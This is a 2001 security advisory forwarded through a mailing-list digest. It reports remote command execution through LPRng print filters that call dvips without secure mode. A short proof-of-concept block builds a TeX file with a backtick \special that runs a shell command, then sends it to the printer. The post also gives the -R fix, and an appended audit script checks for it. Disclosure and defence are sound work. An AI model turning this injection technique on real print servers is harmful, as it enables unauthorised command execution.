This is an RFC 1153 digest. (1 message)
----------------------------------------------------------------------

Return-Path: <[EMAIL PROTECTED]>
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:[EMAIL PROTECTED]>
List-Help: <mailto:[EMAIL PROTECTED]>
List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
List-Subscribe: <mailto:[EMAIL PROTECTED]>
Delivered-To: mailing list [EMAIL PROTECTED]
Delivered-To: moderator for [EMAIL PROTECTED]
Received: (qmail 23233 invoked from network); 27 Aug 2001 15:26:23 -0000
X-X-Sender: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <[EMAIL PROTECTED]>
From: zen-parse <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: LPRng/rhs-printfilters - remote execution of commands
Date: Tue, 28 Aug 2001 01:44:55 +1200 (NZST)

(posted to vendor security ppl, no reply, no patch, so posting here.)

--begin forwarded message--

RedHat 7.0 (possibly others)

If the lpd is listening on 0.0.0.0 and no access controls are in place, it
is possible to execute commands as the lp user, assuming tetex-dvips is
installed.

From man dvips:

    ...
    -R  Run in secure mode. This means that ``backtick'' commands from a
        \special{} or \psffile{} macro in the (La)TeX source like
            \special{psfile="`zcat foo.ps.Z"}
        or
            \psffile[72 72 540 720]{"`zcat screendump.ps.gz"}
        are not executed.
    ...

Unless the -R option is passed, the attached file will, when converted to a
.dvi file (tex spool.tex), start a worm. A very primitive, proof of concept
worm, with no payload, but it does stall the printer. (So don't run it
without at least modifying it to do something else.)

/usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi

    ...
    dvips -f $DVIPS_OPTIONS < $TMP_FILE
    ...

change it to

    ...
    dvips -R -f $DVIPS_OPTIONS < $TMP_FILE
    ...

and it should be a little safer.

-- zen-parse

--end forwarded message--

I deleted the worm file before posting this to BugTraq. It's 2 lines of
bash, but not really the kind of thing that is helpful to post here.

-rw-r--r--    1 evil     evil          152 Aug 16 16:37 spool.tex

Instead, use this to test your machine.

    # delimiter is quoted so the backtick reaches the .tex file literally
    # instead of being expanded by the shell while writing it
    cat >proof-of-concept.tex <<'EOF'
    \special{psfile="`touch /tmp/lpowned"}
    \end
    EOF
    tex proof-of-concept
    lpr proof-of-concept.dvi

-- zen-parse

[ mp3.com/cosv - new music added this month ]
[ ============ ]
[ ========================== ]

--
-------------------------------------------------------------------------
The preceding information, unless directly posted by [EMAIL PROTECTED] to an
open forum is confidential information and not to be distributed (without
explicit permission being given by [EMAIL PROTECTED]). Legal action may be
taken to enforce this. If you are mum or dad, this probably doesn't apply
to you.

------------------------------

End of this Digest
******************

--
Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/
------------------------------------------------
The mailing list archives are available at
http://lists.linux-india.org/cgi-bin/wilma/linux-delhi
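The post above describes two things an administrator can check: whether the print filter's dvips call carries -R (secure mode), and whether a queued (La)TeX job contains the backtick form of \special{} or \psffile{} that dvips would otherwise run. The script below is an added example and is not part of zen-parse's post or of rhs-printfilters; it builds its own constructed sample files (a filter line as shipped, the same line with -R added, a benign job and one carrying a backtick special whose command is the harmless `true`) and runs both checks over them. The function names, the scratch directory and the sample contents are assumptions for the demo; the only page-specific path is the filter file the post names, /usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi, which you would pass to filter_dvips_is_secure on a real system.

```shell
#!/bin/sh
# Added example (not from the original post). Defender-side checks for the
# dvips backtick issue:
#   filter_dvips_is_secure SCRIPT  - every dvips call in a print filter
#                                    script passes -R (secure mode)?
#   tex_has_shell_special FILE     - does a (La)TeX source carry a \special
#                                    or \psffile argument that starts with a
#                                    backtick, the form dvips executes
#                                    unless -R is given?
# Sample files are constructed below for the demo; on a real box you would
# point the first check at /usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi
# (the file named in the post) and the second at the spool directory.

filter_dvips_is_secure() {
    awk '
        # strip shell comments, pad with spaces so word matches are simple
        { sub(/#.*/, ""); line = " " $0 " " }
        line ~ /[ \t]dvips[ \t]/ {
            found = 1
            # -R must appear literally on the same command line; a -R that
            # only lives inside a variable such as $DVIPS_OPTIONS is not
            # seen by this static check (assumption of the demo).
            if (line !~ /[ \t]-R[ \t]/) insecure = 1
        }
        END { if (found && !insecure) exit 0; exit 1 }
    ' "$1" 2>/dev/null
}

tex_has_shell_special() {
    # TeX comments (% to end of line) are ignored; a backtick inside the
    # argument of \special or \psffile is what dvips treats as a command.
    sed 's/%.*//' "$1" 2>/dev/null | grep -qE '\\(special|psffile)[^`]*"?`'
}

# Constructed samples (demo data, not real spool contents).
make_samples() {
    dir="$1"
    mkdir -p "$dir"
    # filter line as shipped, and with the fix from the post applied
    printf '%s\n' 'dvips -f $DVIPS_OPTIONS < $TMP_FILE'    > "$dir/insecure.fpi"
    printf '%s\n' 'dvips -R -f $DVIPS_OPTIONS < $TMP_FILE' > "$dir/secure.fpi"
    # an ordinary job, and one with a backtick special (harmless command)
    printf '%s\n' '\special{psfile="figure.ps"}' '\end' > "$dir/benign.tex"
    printf '%s\n' '\special{psfile="`true"}' '\end'     > "$dir/backtick.tex"
}

audit() {
    dir="${TMPDIR:-/tmp}/dvips-audit.$$"
    make_samples "$dir"
    for f in "$dir"/*.fpi; do
        if filter_dvips_is_secure "$f"; then echo "OK       $f"; else echo "INSECURE $f"; fi
    done
    for f in "$dir"/*.tex; do
        if tex_has_shell_special "$f"; then echo "SUSPECT  $f"; else echo "clean    $f"; fi
    done
    rm -rf "$dir"
}

audit
```

Both checks are deliberately static: the first only sees a literal -R on the dvips line, so a filter that passes the flag through an environment variable must be checked by reading that variable's definition as well, and the second flags any backtick inside a \special or \psffile argument rather than trying to parse the full macro syntax. Either result is a prompt to look at the file, not a verdict on its own.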
